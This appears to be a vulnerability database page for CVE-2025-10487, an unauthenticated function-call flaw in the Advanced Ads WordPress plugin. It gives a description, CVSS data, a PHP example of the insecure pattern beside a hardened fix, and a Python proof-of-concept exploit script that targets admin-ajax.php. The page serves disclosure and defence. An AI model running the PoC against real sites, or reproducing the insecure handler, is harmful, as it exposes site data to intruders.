Security Vulnerability Report
CVE-2025-10487 CVSS 7.3 HIGH

CVE-2025-10487

Published: 2025-11-01 07:15:34
Last Modified: 2026-04-15 00:35:42

Description

The Advanced Ads – Ad Manager & AdSense plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.0.12 via the select_one() function. The plugin neither restricts access to the AJAX endpoint nor limits the functions it will call to a safe set. This makes it possible for unauthenticated attackers to call arbitrary functions beginning with get_the_, such as get_the_excerpt, which can lead to information exposure.
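The bug class the description names is an AJAX handler that dispatches to a PHP function chosen by the request, gated only by a name prefix and reachable without authentication. The following is an added illustration, not the Advanced Ads plugin's own code: it shows a simplified handler with that defect next to a hardened version that uses an explicit allowlist of operations, a nonce, and capability checks. The action slug advads_ad_select_one and the func parameter are taken from the PoC on this page; the hook names, the operation keys, the nonce action name, and the edit_posts capability are assumptions chosen for the example.

```php
<?php
/**
 * Added example for CVE-2025-10487's bug class; not the plugin's code.
 * The action slug 'advads_ad_select_one' and the 'func' parameter come
 * from the PoC on this page. Hook names, operation keys, the nonce action
 * and the capability used are assumptions for illustration.
 */

// --- Vulnerable pattern (simplified illustration of the bug class) ---
// The callee is named by the client and filtered only by prefix, so every
// function starting with "get_the_" is reachable, including ones that return
// post data. In the vulnerable pattern this handler would be registered for
// anonymous users too, e.g. on 'wp_ajax_nopriv_advads_ad_select_one'.
function insecure_select_one() {
    $func = isset( $_POST['func'] ) ? (string) $_POST['func'] : '';
    if ( strpos( $func, 'get_the_' ) === 0 && function_exists( $func ) ) {
        echo call_user_func( $func ); // attacker-controlled dispatch
    }
    wp_die();
}

// --- Hardened pattern ---
// 1. The request names an operation key, never a PHP function; only the
//    allowlist below is callable.
// 2. A nonce ties the request to a page the site served to this user.
// 3. Capability checks limit both who may call the endpoint and which post
//    data may be returned.
// 4. The handler is registered only for logged-in users (no nopriv hook).
const SECURE_SELECT_ONE_OPS = [
    'excerpt' => 'get_the_excerpt',
    'title'   => 'get_the_title',
];

function secure_select_one() {
    // Rejects the request (HTTP 403) if the nonce is missing or invalid.
    check_ajax_referer( 'advads_select_one', 'nonce' );

    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_send_json_error( 'insufficient permissions', 403 );
    }

    $op      = isset( $_POST['op'] ) ? sanitize_key( wp_unslash( $_POST['op'] ) ) : '';
    $post_id = isset( $_POST['post_id'] ) ? absint( $_POST['post_id'] ) : 0;

    if ( ! array_key_exists( $op, SECURE_SELECT_ONE_OPS ) ) {
        wp_send_json_error( 'unknown operation', 400 );
    }

    // Never disclose content the caller could not read through the normal UI
    // (drafts, private posts, password-protected posts).
    if ( ! $post_id || ! current_user_can( 'read_post', $post_id ) ) {
        wp_send_json_error( 'not found', 404 );
    }

    $callee = SECURE_SELECT_ONE_OPS[ $op ];
    wp_send_json_success( [ 'value' => call_user_func( $callee, $post_id ) ] );
}
add_action( 'wp_ajax_advads_ad_select_one', 'secure_select_one' );
```

The key design change is that the request can no longer influence which PHP function runs: it selects a key in a fixed map, and any value outside that map is rejected before any call is made. The nonce and capability checks are independent layers; even if a future allowlist entry turned out to be sensitive, an anonymous caller would never reach it.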

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Advanced Ads WordPress plugin <= 2.0.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-10487 PoC - Advanced Ads Plugin Unauthorized Function Call
# Target: WordPress site with Advanced Ads plugin <= 2.0.12


def exploit_cve_2025_10487(target_url, func_name='get_the_excerpt'):
    """
    Exploit for CVE-2025-10487: Advanced Ads Plugin Remote Code execution
    via unauthorized AJAX endpoint function call.

    Args:
        target_url: Base URL of the WordPress site
        func_name: WordPress function to call (default: get_the_excerpt)

    Returns:
        Response content from the exploited endpoint
    """
    endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    payload = {
        'action': 'advads_ad_select_one',
        'func': func_name
    }
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }
    try:
        print(f"[*] Targeting: {target_url}")
        print(f"[*] Exploiting endpoint: {endpoint}")
        print(f"[*] Calling function: {func_name}")
        response = requests.post(endpoint, data=payload, headers=headers, timeout=10)
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)} bytes")
        if response.status_code == 200:
            print("[+] Exploit executed successfully!")
            print(f"[+] Response:\n{response.text[:500]}")
            return response.text
        else:
            print("[-] Exploit failed - check target or plugin version")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-10487.py <target_url> [function_name]")
        print("Example: python cve-2025-10487.py https://example.com get_the_excerpt")
        sys.exit(1)
    target = sys.argv[1]
    func = sys.argv[2] if len(sys.argv) > 2 else 'get_the_excerpt'
    exploit_cve_2025_10487(target, func)
```

References

- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3381123%40advanced-ads&new=3381123%40advanced-ads&sfp_email=&sfph_mail= (plugin changeset)
- https://www.wordfence.com/threat-intel/vulnerabilities/id/3efe6b81-72db-4419-92a3-26e22ebf46e8?source=cve (Wordfence advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-10487", "sourceIdentifier": "[email protected]", "published": "2025-11-01T07:15:33.610", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Advanced Ads – Ad Manager & AdSense plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.0.12 via the select_one() function. This is due to the endpoint not properly restricting access to the AJAX endpoint or limiting the functions that can be called to safe functions. This makes it possible for unauthenticated attackers to call arbitrary functions beginning with get_the_ like get_the_excerpt which can make information exposure possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3381123%40advanced-ads&new=3381123%40advanced-ads&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3efe6b81-72db-4419-92a3-26e22ebf46e8?source=cve", "source": "[email protected]"}]}}
```